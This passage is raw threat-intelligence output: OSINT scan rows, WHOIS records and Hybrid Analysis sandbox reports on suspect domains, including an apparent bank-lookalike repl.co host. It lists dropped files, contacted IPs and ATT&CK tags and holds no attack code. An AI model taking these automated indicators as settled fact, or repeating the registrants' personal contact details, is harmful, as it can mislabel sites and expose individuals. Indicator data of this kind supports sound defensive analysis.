[%APPDATA%\\Microsoft\\Windows\\Cookies\\0P8ZVUES.txt]- [targetUID: 00000000-00003076]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- 
[targetUID: N/A]\n "search_2_.json" has type "JSON data"- [targetUID: N/A]\n "HOMR1HKK.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\HOMR1HKK.txt]- [targetUID: 00000000-00003076]\n "_F47B88D9-66DA-11ED-B548-08002704E6C2_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "css_2_.css" has type "ASCII text"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "_FD56E52C-66DA-11ED-B548-08002704E6C2_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "zYXgKVElMYYaJe8bpLHnCwDKhdHeEw_1_.woff" has type "Web Open Font Format TrueType length 22912 version 1.1"- [targetUID: N/A]\n "~DF27D127E97D4620C6.TMP" has type "data"- Location: [%TEMP%\\~DF27D127E97D4620C6.TMP]- [targetUID: 00000000-00003076]\n "70BYFHVI.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\70BYFHVI.txt]- [targetUID: 00000000-00003076]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00003076]\n "favicon_3_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "css_1_.css" has type "ASCII text"- [targetUID: N/A]\n "~DF124D53EE7F9A90CB.TMP" has type "data"- Location: [%TEMP%\\~DF124D53EE7F9A90CB.TMP]- [targetUID: 00000000-00003076]\n "0P8ZVUES.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\0P8ZVUES.txt]- [targetUID: 00000000-00003076]\n "favicon_2_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "~DFC68A1D769C014E40.TMP" has type "data"- Location: [%TEMP%\\~DFC68A1D769C014E40.TMP]- [targetUID: 00000000-00003076]\n "RecoveryStore._F47B88D7-66DA-11ED-B548-08002704E6C2_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n 
"~DFE4673773FB07FA74.TMP" has type "data"- Location: [%TEMP%\\~DFE4673773FB07FA74.TMP]- [targetUID: 00000000-00003076]'}, {u'category': u'Network Related', u'origin': u'String', u'identifier': u'string-102', u'name': u'Decrypted SSL network traffic', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"GET / HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: portalpersonasparatodo.tdavivienda.repl.co\nDNT: 1\nConnection: Keep-Alive"\n "HTTP/1.1 404 Not Found\nExpect-Ct: max-age=2592000, report-uri="https://sentry.repl.it/api/10/security/?sentry_key=615192fd532445bfbbbe966cd7131791"\nReplit-Cluster: global\nStrict-Transport-Security: max-age=7558278; includeSubDomains\nDate: Fri, 18 Nov 2022 01:50:19 GMT\nContent-Type: text/html; charset=utf-8\nTransfer-Encoding: chunked\n\n800\n\n\n \n 34.149.204.188 2022-12-18 00:21:10 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None fse2 (Net ID: 00:01:38:A0:A1:09) 37.7803446,-122.3906132 2022-12-18 00:09:10 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.96.0:8080 188.114.96.0/24 2022-12-18 00:26:50 Physical Location No MetaDefender 0 0 2 0 None Firenze, Italy 81.88.52.232 2022-12-18 00:03:10 Co-Hosted Site No SSL Certificate Analyzer 0 0 1 0 None webapps.net zerotwo-best-waifu.online 2022-12-18 00:21:20 Open TCP Port No Censys 0 0 2 0 None 188.114.97.1:2087 188.114.97.1 2022-12-18 00:32:23 Similar Domain Yes TLD Searcher 0 0 1 0 None plague.world plague.fun 2022-12-18 00:22:07 Raw Data from RIRs No Censys 4 0 2 0 None {"last_updated_at": "2022-12-17T20:42:12.354Z", "ip": "34.149.204.188", "location_updated_at": "2022-12-14T04:27:41.707226Z", "autonomous_system_updated_at": "2022-12-14T04:27:41.801832Z", "location": {"province": 
"Missouri", "city": "Kansas City", "country": "United States", "coordinates": {"latitude": 39.1027, "longitude": -94.5778}, "registered_country": "United States", "registered_country_code": "US", "postal_code": "64184", "country_code": "US", "timezone": "America/Chicago", "continent": "North America"}} 34.149.204.188 2022-12-18 00:21:34 HTTP Headers No Censys 0 0 2 0 None {"Content_Length": ["253"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Cf_Ray": ["-"], "Connection": ["close"], "Content_Type": ["text/html"], "Date": [""]} 104.21.19.243 2022-12-18 00:27:49 Country No Country Name Extractor 0 0 7 0 None Italy Domain Name: dominiando.us Registry Domain ID: D19621490-US Registrar WHOIS Server: Registrar URL: https://key-systems.net Updated Date: 2022-06-06T00:00:06Z Creation Date: 2009-04-22T11:21:03Z Registry Expiry Date: 2023-04-21T23:59:59Z Registrar: Key-Systems GmbH Registrar IANA ID: 269 Registrar Abuse Contact Email: abuse@key-systems.net Registrar Abuse Contact Phone: +49.6894939685 Domain Status: ok https://icann.org/epp#ok Registry Registrant ID: C19621489-US Registrant Name: Francesco Pacaccio Registrant Organization: Dominiando Srl Registrant Street: Piazzale Clodio 8 Registrant Street: Registrant Street: Registrant City: Roma Registrant State/Province: Registrant Postal Code: 00195 Registrant Country: IT Registrant Phone: +39.068072248 Registrant Phone Ext: Registrant Fax: Registrant Fax Ext: Registrant Email: domini@dominiando.it Registrant Application Purpose: P1 Registrant Nexus Category: C31/IT Registry Admin ID: C19621489-US Admin Name: Francesco Pacaccio Admin Organization: Dominiando Srl Admin Street: Piazzale Clodio 8 Admin Street: Admin Street: Admin City: Roma Admin State/Province: Admin Postal Code: 00195 Admin Country: IT Admin Phone: +39.068072248 Admin Phone Ext: Admin Fax: Admin Fax Ext: Admin Email: domini@dominiando.it Admin Application Purpose: P1 Admin Nexus Category: C31/IT Registry Tech ID: C2262438-US Tech Name: Domain
Management Tech Organization: Dominiando Srl Tech Street: Piazzale Clodio 8 Tech Street: Tech Street: Tech City: Rome Tech State/Province: IT Tech Postal Code: 00195 Tech Country: IT Tech Phone: +39.0680693248 Tech Phone Ext: Tech Fax: +39.06233200178 Tech Fax Ext: Tech Email: domini@dominiando.it Tech Application Purpose: P1 Tech Nexus Category: C31/IT Name Server: ns.dominiando.it Name Server: ns.dominiando.asia Name Server: ns.dominiando.uk Name Server: ns.dominiando.us DNSSEC: unsigned URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of WHOIS database: 2022-12-18T00:26:49Z <<< For more information on Whois status codes, please visit https://icann.org/epp .US WHOIS Complaint Tool - http://www.whoiscomplaints.us Advanced WHOIS Instructions - http://whois.us/help.html Registry Services, LLC, the Registry Administrator for .US, has collected this information for the WHOIS database through a .US-Accredited Registrar. This information is provided to you for informational purposes only and is designed to assist persons in determining contents of a domain name registration record in the registry database. Registry Services, LLC makes this information available to you "as is" and does not guarantee its accuracy. By submitting a WHOIS query, you agree that you will use this data only for lawful purposes and that, under no circumstances will you use this data: (1) to allow, enable, or otherwise support the transmission of mass unsolicited, commercial advertising or solicitations via direct mail, electronic mail, or by telephone; (2) in contravention of any applicable data and privacy protection laws; or (3) to enable high volume, automated, electronic processes that apply to the registry (or its systems). Compilation, repackaging, dissemination, or other use of the WHOIS database in its entirety, or of a substantial portion thereof, is not allowed without our prior written permission. 
We reserve the right to modify or change these conditions at any time without prior or subsequent notification of any kind. By executing this query, in any manner whatsoever, you agree to abide by these terms. NOTE: FAILURE TO LOCATE A RECORD IN THE WHOIS DATABASE IS NOT INDICATIVE OF THE AVAILABILITY OF A DOMAIN NAME. All domain names are subject to certain additional domain name registration rules. For details, please visit our site at www.whois.us. 2022-12-18 00:12:24 Physical Location No ipapi.co 0 0 2 0 None Campinas, Sao Paulo, SP, Brazil, BR 20.226.56.97 2022-12-18 00:59:52 Affiliate - Email Address No E-Mail Address Extractor 0 0 3 0 None 41c364fb5187478eb52fa456269b7aef.protect@withheldforprivacy.com Domain Name: misogyny.org Registry Domain ID: 306b87640a9a4177b66ed5ee2d15d5eb-LROR Registrar WHOIS Server: whois.namecheap.com Registrar URL: http://www.namecheap.com Updated Date: 2022-12-01T05:06:01Z Creation Date: 2000-01-03T07:35:22Z Registry Expiry Date: 2024-01-03T07:35:22Z Registrar: NameCheap, Inc. Registrar IANA ID: 1068 Registrar Abuse Contact Email: abuse@namecheap.com Registrar Abuse Contact Phone: +1.6613102107 Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Registry Registrant ID: REDACTED FOR PRIVACY Registrant Name: REDACTED FOR PRIVACY Registrant Organization: Privacy service provided by Withheld for Privacy ehf Registrant Street: REDACTED FOR PRIVACY Registrant City: REDACTED FOR PRIVACY Registrant State/Province: Capital Region Registrant Postal Code: REDACTED FOR PRIVACY Registrant Country: IS Registrant Phone: REDACTED FOR PRIVACY Registrant Phone Ext: REDACTED FOR PRIVACY Registrant Fax: REDACTED FOR PRIVACY Registrant Fax Ext: REDACTED FOR PRIVACY Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. 
Registry Admin ID: REDACTED FOR PRIVACY Admin Name: REDACTED FOR PRIVACY Admin Organization: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin City: REDACTED FOR PRIVACY Admin State/Province: REDACTED FOR PRIVACY Admin Postal Code: REDACTED FOR PRIVACY Admin Country: REDACTED FOR PRIVACY Admin Phone: REDACTED FOR PRIVACY Admin Phone Ext: REDACTED FOR PRIVACY Admin Fax: REDACTED FOR PRIVACY Admin Fax Ext: REDACTED FOR PRIVACY Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registry Tech ID: REDACTED FOR PRIVACY Tech Name: REDACTED FOR PRIVACY Tech Organization: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech City: REDACTED FOR PRIVACY Tech State/Province: REDACTED FOR PRIVACY Tech Postal Code: REDACTED FOR PRIVACY Tech Country: REDACTED FOR PRIVACY Tech Phone: REDACTED FOR PRIVACY Tech Phone Ext: REDACTED FOR PRIVACY Tech Fax: REDACTED FOR PRIVACY Tech Fax Ext: REDACTED FOR PRIVACY Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Name Server: ns1.dan.com Name Server: ns2.dan.com DNSSEC: unsigned URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of WHOIS database: 2022-12-18T00:59:51Z <<< For more information on Whois status codes, please visit https://icann.org/epp Terms of Use: Access to Public Interest Registry WHOIS information is provided to assist persons in determining the contents of a domain name registration record in the Public Interest Registry registry database. The data in this record is provided by Public Interest Registry for informational purposes only, and Public Interest Registry does not guarantee its accuracy. This service is intended only for query-based access. 
You agree that you will use this data only for lawful purposes and that, under no circumstances will you use this data to (a) allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the data recipient's own existing customers; or (b) enable high volume, automated, electronic processes that send queries or data to the systems of Registry Operator, a Registrar, or Identity Digital except as reasonably necessary to register domain names or modify existing registrations. All rights reserved. Public Interest Registry reserves the right to modify these terms at any time. By submitting this query, you agree to abide by this policy. The Registrar of Record identified in this output may have an RDDS service that can be queried for additional information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Domain name: misogyny.org Registry Domain ID: 306b87640a9a4177b66ed5ee2d15d5eb-LROR Registrar WHOIS Server: whois.namecheap.com Registrar URL: http://www.namecheap.com Updated Date: 2022-11-26T05:05:02.00Z Creation Date: 2000-01-03T07:35:22.43Z Registrar Registration Expiration Date: 2024-01-03T07:35:22.00Z Registrar: NAMECHEAP INC Registrar IANA ID: 1068 Registrar Abuse Contact Email: abuse@namecheap.com Registrar Abuse Contact Phone: +1.9854014545 Reseller: NAMECHEAP INC Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Domain Status: transferPeriod https://icann.org/epp#transferPeriod Registry Registrant ID: Registrant Name: Redacted for Privacy Registrant Organization: Privacy service provided by Withheld for Privacy ehf Registrant Street: Kalkofnsvegur 2 Registrant City: Reykjavik Registrant State/Province: Capital Region Registrant Postal Code: 101 Registrant Country: IS Registrant Phone: +354.4212434 Registrant Phone Ext: Registrant Fax: Registrant Fax Ext: Registrant Email: 
41c364fb5187478eb52fa456269b7aef.protect@withheldforprivacy.com Registry Admin ID: Admin Name: Redacted for Privacy Admin Organization: Privacy service provided by Withheld for Privacy ehf Admin Street: Kalkofnsvegur 2 Admin City: Reykjavik Admin State/Province: Capital Region Admin Postal Code: 101 Admin Country: IS Admin Phone: +354.4212434 Admin Phone Ext: Admin Fax: Admin Fax Ext: Admin Email: 41c364fb5187478eb52fa456269b7aef.protect@withheldforprivacy.com Registry Tech ID: Tech Name: Redacted for Privacy Tech Organization: Privacy service provided by Withheld for Privacy ehf Tech Street: Kalkofnsvegur 2 Tech City: Reykjavik Tech State/Province: Capital Region Tech Postal Code: 101 Tech Country: IS Tech Phone: +354.4212434 Tech Phone Ext: Tech Fax: Tech Fax Ext: Tech Email: 41c364fb5187478eb52fa456269b7aef.protect@withheldforprivacy.com Name Server: ns1.dan.com Name Server: ns2.dan.com DNSSEC: unsigned URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/ >>> Last update of WHOIS database: 2022-12-17T21:59:51.97Z <<< For more information on Whois status codes, please visit https://icann.org/epp 2022-12-18 00:21:34 HTTP Headers No Censys 0 0 2 0 None {"Content_Length": ["253"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Cf_Ray": ["-"], "Connection": ["close"], "Content_Type": ["text/html"], "Date": [""]} 104.21.19.243 2022-12-18 00:21:20 Open TCP Port No Censys 0 0 2 0 None 188.114.97.1:8443 188.114.97.1 2022-12-18 00:05:13 Linked URL - Internal No Hybrid Analysis 0 0 2 0 None http://misogyny.wtf:8080/ 20.226.83.185 2022-12-18 00:30:56 Affiliate - Email Address No E-Mail Address Extractor 0 0 3 0 None abuse@namecheap.com Domain Name: PLAGUE.BAR Registry Domain ID: D259269512-CNIC Registrar WHOIS Server: whois.namecheap.com Registrar URL: https://namecheap.com Updated 
Date: 2022-11-28T12:31:46.0Z Creation Date: 2021-11-13T11:43:17.0Z Registry Expiry Date: 2023-11-13T23:59:59.0Z Registrar: Namecheap Registrar IANA ID: 1068 Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Domain Status: autoRenewPeriod https://icann.org/epp#autoRenewPeriod Registrant Organization: Withheld for Privacy Purposes Registrant State/Province: Capital Region Registrant Country: IS Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Name Server: DNS101.REGISTRAR-SERVERS.COM Name Server: DNS102.REGISTRAR-SERVERS.COM DNSSEC: unsigned Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registrar Abuse Contact Email: abuse@namecheap.com Registrar Abuse Contact Phone: +1.9854014545 URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of WHOIS database: 2022-12-18T00:30:55.0Z <<< For more information on Whois status codes, please visit https://icann.org/epp >>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit https://www.centralnic.com/support/rdap <<< The Whois and RDAP services are provided by CentralNic, and contain information pertaining to Internet domain names registered by our our customers. 
By using this service you are agreeing (1) not to use any information presented here for any purpose other than determining ownership of domain names, (2) not to store or reproduce this data in any way, (3) not to use any high-volume, automated, electronic processes to obtain data from this service. Abuse of this service is monitored and actions in contravention of these terms will result in being permanently blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com) Access to the Whois and RDAP services is rate limited. For more information, visit https://registrar-console.centralnic.com/pub/whois_guidance. Domain name: plague.bar Registry Domain ID: D259269512-CNIC Registrar WHOIS Server: whois.namecheap.com Registrar URL: http://www.namecheap.com Updated Date: 0001-01-01T00:00:00.00Z Creation Date: 2021-11-13T11:43:17.00Z Registrar Registration Expiration Date: 2022-11-13T11:43:17.00Z Registrar: NAMECHEAP INC Registrar IANA ID: 1068 Registrar Abuse Contact Email: abuse@namecheap.com Registrar Abuse Contact Phone: +1.9854014545 Reseller: NAMECHEAP INC Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Registry Registrant ID: Registrant Name: REACTIVATION PERIOD Registrant Organization: Withheld for Privacy Purposes Registrant Street: Kalkofnsvegur 2 Registrant City: Reykjavik Registrant State/Province: Capital Region Registrant Postal Code: 101 Registrant Country: IS Registrant Phone: +354.4212434 Registrant Phone Ext: Registrant Fax: Registrant Fax Ext: Registrant Email: reactivation-pending@mail.withheldforprivacy.com Registry Admin ID: Admin Name: REACTIVATION PERIOD Admin Organization: Withheld for Privacy Purposes Admin Street: Kalkofnsvegur 2 Admin City: Reykjavik Admin State/Province: Capital Region Admin Postal Code: 101 Admin Country: IS Admin Phone: +354.4212434 Admin Phone Ext: Admin Fax: Admin Fax Ext: Admin Email: reactivation-pending@mail.withheldforprivacy.com Registry Tech ID: Tech Name: 
REACTIVATION PERIOD Tech Organization: Withheld for Privacy Purposes Tech Street: Kalkofnsvegur 2 Tech City: Reykjavik Tech State/Province: Capital Region Tech Postal Code: 101 Tech Country: IS Tech Phone: +354.4212434 Tech Phone Ext: Tech Fax: Tech Fax Ext: Tech Email: reactivation-pending@mail.withheldforprivacy.com Name Server: dns101.registrar-servers.com Name Server: dns102.registrar-servers.com DNSSEC: unsigned URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/ >>> Last update of WHOIS database: 2022-12-17T21:30:55.95Z <<< For more information on Whois status codes, please visit https://icann.org/epp 2022-12-18 00:05:26 Raw Data from RIRs No Hybrid Analysis 0 0 2 0 None [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': None, u'total_processes': 20, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'http://greenface.site/', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"104.21.7.179:80"\n "142.251.33.78:443"\n "142.251.33.67:443"\n "142.250.69.200:443"\n "142.250.69.206:443"\n "142.251.215.227:443"\n "108.177.98.155:443"\n "142.251.211.227:443"\n "142.251.215.225:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"greenface.site"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', 
u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:5660:120:WilError_01"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:5660:304:WilStaging_02"\n "Local\\SM0:5864:120:WilError_01"\n "Local\\SM0:5864:304:WilStaging_02"\n "Local\\InternetShortcutMutex"\n "Local\\SM0:5660:304:WilStaging_02"\n "Local\\SM0:5660:120:WilError_01"\n "Local\\ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\DBWinMutex"\n "DBWinMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:8072:304:WilStaging_02"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"greenface.site"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\shared_proto_db\\metadata\\000003.log]- [targetUID: 00000000-00005660]\n "f_00024d" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 baseline precision 8 700x280 frames 3"- [targetUID: N/A]\n "wallet-tokenization-config.json" has type "ASCII text"- Location: [%TEMP%\\5660_724844775\\json\\wallet\\wallet-tokenization-config.json]- [targetUID: 00000000-00005660]\n "2ba0ddf5-42d6-4da2-b87c-cac737035349.tmp" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "41962708-5ff7-401a-b529-72280b6896cf.tmp" has type "UTF-8 Unicode text with very long lines 
with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\41962708-5ff7-401a-b529-72280b6896cf.tmp]- [targetUID: 00000000-00005660]\n "383b5ee4-111b-4e65-a5e3-016134095cae.tmp" has type "ASCII text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Network\\383b5ee4-111b-4e65-a5e3-016134095cae.tmp]- [targetUID: 00000000-00006840]\n "99b70833-a7c9-4f88-9e7f-fbfcb2bd3c6e.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\99b70833-a7c9-4f88-9e7f-fbfcb2bd3c6e.tmp]- [targetUID: 00000000-00005660]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00005660]\n "f_00023e" has type "ASCII text with very long lines"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_00023e]- [targetUID: 00000000-00006840]\n "3437493e-8bd9-46b8-9074-22a4b871703a.tmp" has type "ASCII text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Network\\3437493e-8bd9-46b8-9074-22a4b871703a.tmp]- [targetUID: 00000000-00006840]\n "03cc95bd-1754-476e-b462-79536e7625ef.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\03cc95bd-1754-476e-b462-79536e7625ef.tmp]- [targetUID: 00000000-00005660]\n "f_000243" has type "gzip compressed data from FAT filesystem (MS-DOS OS/2 NT)"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_000243]- [targetUID: 00000000-00006840]\n "f_00023d" has type "gzip compressed data max compression"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_00023d]- [targetUID: 00000000-00006840]\n "wallet.bundle.js" has type 
"UTF-8 Unicode text with very long lines with no line terminators"- Location: [%TEMP%\\5660_724844775\\wallet.bundle.js]- [targetUID: 00000000-00005660]\n "wallet-drawer.html" has type "HTML document ASCII text with very long lines"- Location: [%TEMP%\\5660_724844775\\Wallet-Checkout\\wallet-drawer.html]- [targetUID: 00000000-00005660]\n "shopping_iframe_driver.js" has type "ASCII text with very long lines with CRLF line terminators"- Location: [%TEMP%\\5660_1719137669\\shopping_iframe_driver.js]- [targetUID: 00000000-00005660]\n "settings.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Crashpad\\settings.dat]- [targetUID: 00000000-00007536]\n "wallet.html" has type "HTML document ASCII text with very long lines"- Location: [%TEMP%\\5660_724844775\\wallet.html]- [targetUID: 00000000-00005660]\n "runtime.bundle.js" has type "ASCII text with very long lines with no line terminators"- Location: [%TEMP%\\5660_724844775\\runtime.bundle.js]- [targetUID: 00000000-00005660]\n "Last Browser" has type "data"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'String', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "http://greenface.site/"\n Pattern match: "http://greenface.site"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-35', u'name': u'Drops script files inside temp directory', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 1, u'type': 8, u'description': u'Dropped file: "wallet.bundle.js" - Location: [%TEMP%\\5660_724844775\\wallet.bundle.js]- [targetUID: 00000000-00005660]\n Dropped file: "shopping_iframe_driver.js" - Location: [%TEMP%\\5660_1719137669\\shopping_iframe_driver.js]- 
[targetUID: 00000000-00005660]\n Dropped file: "runtime.bundle.js" - Location: [%TEMP%\\5660_724844775\\runtime.bundle.js]- [targetUID: 00000000-00005660]\n Dropped file: "app-setup.js" - Location: [%TEMP%\\5660_724844775\\Wallet-Checkout\\app-setup.js]- [targetUID: 00000000-00005660]\n Dropped file: "edge_tracking_page_validator.js" - Location: [%TEMP%\\5660_1719137669\\edge_tracking_page_validator.js]- [targetUID: 00000000-00005660]\n Dropped file: "product_page.js" - Location: [%TEMP%\\5660_1719137669\\product_page.js]- [targetUID: 00000000-00005660]\n Dropped file: "shopping.js" - Location: [%TEMP%\\5660_1719137669\\shopping.js]- [targetUID: 00000000-00005660]\n Dropped file: "tokenized-card.bundle.js" - Location: [%TEMP%\\5660_724844775\\Tokenized-Card\\tokenized-card.bundle.js]- [targetUID: 00000000-00005660]\n Dropped file: "vendor.bundle.js" - Location: [%TEMP%\\5660_724844775\\vendor.bundle.js]- [targetUID: 00000000-00005660]\n Dropped file: "auto_open_controller.js" - Location: [%TEMP%\\5660_1719137669\\auto_open_controller.js]- [targetUID: 00000000-00005660]\n Dropped file: "crypto.bundle.js" - Location: [%TEMP%\\5660_724844775\\crypto.bundle.js]- [targetUID: 00000000-00005660]\n Dropped file: "shoppingfre.js" - Location: [%TEMP%\\5660_1719137669\\shoppingfre.js]- [targetUID: 00000000-00005660]\n Dropped file: "wallet-drawer.bundle.js" - Location: [%TEMP%\\5660_724844775\\Wallet-Checkout\\wallet-drawer.bundle.js]- [targetUID: 00000000-00005660]\n Dropped file: "adblock_snippet.js" - Location: [%TEMP%\\5660_160949656\\adblock_snippet.js]- [targetUID: 00000000-00005660]\n Dropped file: "notification.bundle.js" - Location: [%TEMP%\\5660_724844775\\Notification\\notification.bundle.js]- [targetUID: 00000000-00005660]\n Dropped file: "edge_driver.js" - Location: [%TEMP%\\5660_1719137669\\edge_driver.js]- [targetUID: 00000000-00005660]\n Dropped file: "bnpl_driver.js" - Location: [%TEMP%\\5660_724844775\\bnpl_driver.js]- [targetUID: 00000000-00005660]\n 
Dropped file: "edge_confirmation_page_validator.js" - Location: [%TEMP%\\5660_1719137669\\edge_confirmation_page_validator.js]- [targetUID: 00000000-00005660]\n Dropped file: "edge_checkout_page_validator.js" - Location: [%TEMP%\\5660_1719137669\\edge_checkout_page_validator.js]- [targetUID: 00000000-00005660]'}, {u'category': u'Network Related', u'origin': u'String', u'identifier': u'string-14', u'name': u'Found potential IP address in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 1, u'type': 2, u'description': u'Potential IP "105.0.0.0" found in string "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.53"\n Potential IP "1.0.0.23" found in string "%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Trust Protection Lists\\1.0.0.23\\Mu"\n Potential IP "1.0.0.23" found in 104.21.7.179 2022-12-18 00:21:30 HTTP 